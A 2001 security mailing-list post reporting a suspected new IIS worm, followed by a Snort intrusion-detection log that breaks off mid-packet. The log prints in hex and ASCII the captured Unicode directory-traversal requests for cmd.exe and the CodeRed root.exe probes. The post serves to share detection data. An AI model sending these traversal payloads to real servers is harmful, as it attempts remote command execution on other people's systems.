Interesting Scan--Looks like a new worm.

From: Steve Halligan (agent33at_private)
Date: Tue Sep 18 2001 - 07:13:56 PDT
Next message: Olle Segerdahl: "Concept Virus(CV) V.5 - Quick analysis update"
Previous message: Jason Giglio: "Re: CodeBlue finally hitting, or what?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I got this scan last night.  Actually I got about 20 of these scans last
night from different IP's, all within my class A.  I looks alot like the
SadMind worm, but if you look closely, it isn't.  The scan is a much more
thorough scan for the Unicode directory traversal vulnerability.  SadMind
didn't scan _mem_bin or try to look for cmd.exe on the d drive as this scan
does.  As I said, I got this scan from about 20 different hosts, and
everyone did the same attempts in the same order.
Looks like we got a new worm on our hands.

-Steve

<------------begin scan log----------->
----------------------------------------------------------------------------
--
#(2 - 23173) [2001-09-18 08:44:56]  WEB-IIS root.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=112 ID=51156 flags=0 offset=0 TTL=123 chksum=19696
TCP:  port=2419 -> dport: 80  flags=***AP*** seq=3574684183
      ack=2133368913 off=5 res=0 win=65535 urp=0 chksum=36743
Payload:  length = 72

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F   GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54   t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77   P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63   ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A                           lose....
----------------------------------------------------------------------------
--
#(2 - 23174) [2001-09-18 08:44:57]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=120 ID=51295 flags=0 offset=0 TTL=123 chksum=19549
TCP:  port=2571 -> dport: 80  flags=***AP*** seq=3578917915
      ack=2133369798 off=5 res=0 win=65535 urp=0 chksum=47615
Payload:  length = 80

000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73   GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 23175) [2001-09-18 08:44:57]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=120 ID=51407 flags=0 offset=0 TTL=123 chksum=19437
TCP:  port=2645 -> dport: 80  flags=***AP*** seq=3582698035
      ack=2133370349 off=5 res=0 win=65535 urp=0 chksum=2364
Payload:  length = 80

000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 23176) [2001-09-18 08:45:01]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=136 ID=51893 flags=0 offset=0 TTL=123 chksum=18935
TCP:  port=2649 -> dport: 80  flags=***AP*** seq=3583242352
      ack=2133371302 off=5 res=0 win=65535 urp=0 chksum=33450
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 23177) [2001-09-18 08:45:02]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=157 ID=52026 flags=0 offset=0 TTL=123 chksum=18781
TCP:  port=2818 -> dport: 80  flags=***AP*** seq=3592447432
      ack=2133374805 off=5 res=0 win=65535 urp=0 chksum=17590
Payload:  length = 111

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23178) [2001-09-18 08:45:02]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=157 ID=52122 flags=0 offset=0 TTL=123 chksum=18685
TCP:  port=2891 -> dport: 80  flags=***AP*** seq=3596176073
      ack=2133375355 off=5 res=0 win=65535 urp=0 chksum=25116
Payload:  length = 111

000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E   GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23179) [2001-09-18 08:45:03]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=185 ID=52158 flags=0 offset=0 TTL=123 chksum=18621
TCP:  port=2897 -> dport: 80  flags=***AP*** seq=3596616353
      ack=2133375899 off=5 res=0 win=65535 urp=0 chksum=19409
Payload:  length = 127

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63   GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63   ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E   /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E      Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 23180) [2001-09-18 08:45:03]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=52304 flags=0 offset=0 TTL=123 chksum=18523
TCP:  port=3008 -> dport: 80  flags=***AP*** seq=3601578388
      ack=2133376550 off=5 res=0 win=65535 urp=0 chksum=11948
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23182) [2001-09-18 08:45:04]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=52382 flags=0 offset=0 TTL=123 chksum=18445
TCP:  port=3026 -> dport: 80  flags=***AP*** seq=3603114557
      ack=2133377691 off=5 res=0 win=65535 urp=0 chksum=46692
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23183) [2001-09-18 08:45:05]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=52747 flags=0 offset=0 TTL=123 chksum=18080
TCP:  port=3029 -> dport: 80  flags=***AP*** seq=3603372780
      ack=2133378431 off=5 res=0 win=65535 urp=0 chksum=49819
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23184) [2001-09-18 08:45:05]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=52944 flags=0 offset=0 TTL=123 chksum=17883
TCP:  port=3034 -> dport: 80  flags=***AP*** seq=3603663173
      ack=2133378648 off=5 res=0 win=65535 urp=0 chksum=22151
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23185) [2001-09-18 08:45:07]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=138 ID=53099 flags=0 offset=0 TTL=123 chksum=17727
TCP:  port=3043 -> dport: 80  flags=***AP*** seq=3604607032
      ack=2133380213 off=5 res=0 win=65535 urp=0 chksum=13390
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
----------------------------------------------------------------------------
--
#(2 - 23186) [2001-09-18 08:45:09]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=136 ID=53291 flags=0 offset=0 TTL=123 chksum=17537
TCP:  port=3125 -> dport: 80  flags=***AP*** seq=3609112694
      ack=2133382006 off=5 res=0 win=65535 urp=0 chksum=41583
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 23187) [2001-09-18 08:45:12]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=140 ID=53537 flags=0 offset=0 TTL=123 chksum=17287
TCP:  port=3233 -> dport: 80  flags=***AP*** seq=3614822904
      ack=2133384416 off=5 res=0 win=65535 urp=0 chksum=3730
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23192) [2001-09-18 08:45:25]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=136 ID=56915 flags=0 offset=0 TTL=123 chksum=13913
TCP:  port=3255 -> dport: 80  flags=***AP*** seq=3617233670
      ack=2133389625 off=5 res=0 win=65535 urp=0 chksum=36633
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 23443) [2001-09-18 09:01:44]  WEB-IIS CodeRed v2 root.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=112 ID=6898 flags=0 offset=0 TTL=123 chksum=63955
TCP:  port=3144 -> dport: 80  flags=***AP*** seq=1769080350
      ack=741806457 off=5 res=0 win=65535 urp=0 chksum=11798
Payload:  length = 72

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F   GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54   t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77   P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63   ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A                           lose....
----------------------------------------------------------------------------
--
#(2 - 23444) [2001-09-18 09:01:45]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=120 ID=6924 flags=0 offset=0 TTL=123 chksum=63921
TCP:  port=3149 -> dport: 80  flags=***AP*** seq=1769404108
      ack=741806470 off=5 res=0 win=65535 urp=0 chksum=1563
Payload:  length = 80

000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73   GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 23445) [2001-09-18 09:01:45]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=120 ID=6938 flags=0 offset=0 TTL=123 chksum=63907
TCP:  port=3152 -> dport: 80  flags=***AP*** seq=1769560961
      ack=741934470 off=5 res=0 win=65535 urp=0 chksum=44381
Payload:  length = 80

000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 23446) [2001-09-18 09:01:45]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=136 ID=6955 flags=0 offset=0 TTL=123 chksum=63874
TCP:  port=3155 -> dport: 80  flags=***AP*** seq=1769708384
      ack=741934489 off=5 res=0 win=65535 urp=0 chksum=14551
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 23447) [2001-09-18 09:01:45]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=157 ID=6967 flags=0 offset=0 TTL=123 chksum=63841
TCP:  port=3158 -> dport: 80  flags=***AP*** seq=1769873826
      ack=741934503 off=5 res=0 win=65535 urp=0 chksum=63689
Payload:  length = 111

000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E   GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23448) [2001-09-18 09:01:45]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=157 ID=6978 flags=0 offset=0 TTL=123 chksum=63830
TCP:  port=3159 -> dport: 80  flags=***AP*** seq=1769952837
      ack=741934520 off=5 res=0 win=65535 urp=0 chksum=51490
Payload:  length = 111

000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E   GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E   %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31   dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43   .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F      onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23449) [2001-09-18 09:01:45]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=185 ID=6997 flags=0 offset=0 TTL=123 chksum=63783
TCP:  port=3161 -> dport: 80  flags=***AP*** seq=1770079155
      ack=741934531 off=5 res=0 win=65535 urp=0 chksum=32607
Payload:  length = 127

000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63   GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63   ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E   /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74   ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F   dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E      Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 23450) [2001-09-18 09:01:45]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=137 ID=7023 flags=0 offset=0 TTL=123 chksum=63805
TCP:  port=3168 -> dport: 80  flags=***AP*** seq=1770439362
      ack=741934537 off=5 res=0 win=65535 urp=0 chksum=40273
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23451) [2001-09-18 09:01:45]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=137 ID=7048 flags=0 offset=0 TTL=123 chksum=63780
TCP:  port=3178 -> dport: 80  flags=***AP*** seq=1770941763
      ack=741934543 off=5 res=0 win=65535 urp=0 chksum=61368
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23452) [2001-09-18 09:01:46]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=137 ID=7074 flags=0 offset=0 TTL=123 chksum=63754
TCP:  port=3185 -> dport: 80  flags=***AP*** seq=1771344844
      ack=741934559 off=5 res=0 win=65535 urp=0 chksum=51427
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23453) [2001-09-18 09:01:46]  WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=137 ID=7093 flags=0 offset=0 TTL=123 chksum=63735
TCP:  port=3190 -> dport: 80  flags=***AP*** seq=1771628861
      ack=741934568 off=5 res=0 win=65535 urp=0 chksum=30343
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 23454) [2001-09-18 09:01:46]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=138 ID=7120 flags=0 offset=0 TTL=123 chksum=63707
TCP:  port=3195 -> dport: 80  flags=***AP*** seq=1771898912
      ack=741934579 off=5 res=0 win=65535 urp=0 chksum=41598
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close
----------------------------------------------------------------------------
--
#(2 - 23455) [2001-09-18 09:01:46]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
      hlen=5 TOS=0 dlen=136 ID=7159 flags=0 offset=0 TTL=123 chksum=63670
TCP:  port=3202 -> dport: 80  flags=***AP*** seq=1772285234
      ack=741934584 off=5 res=0 win=65535 urp=0 chksum=62289
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
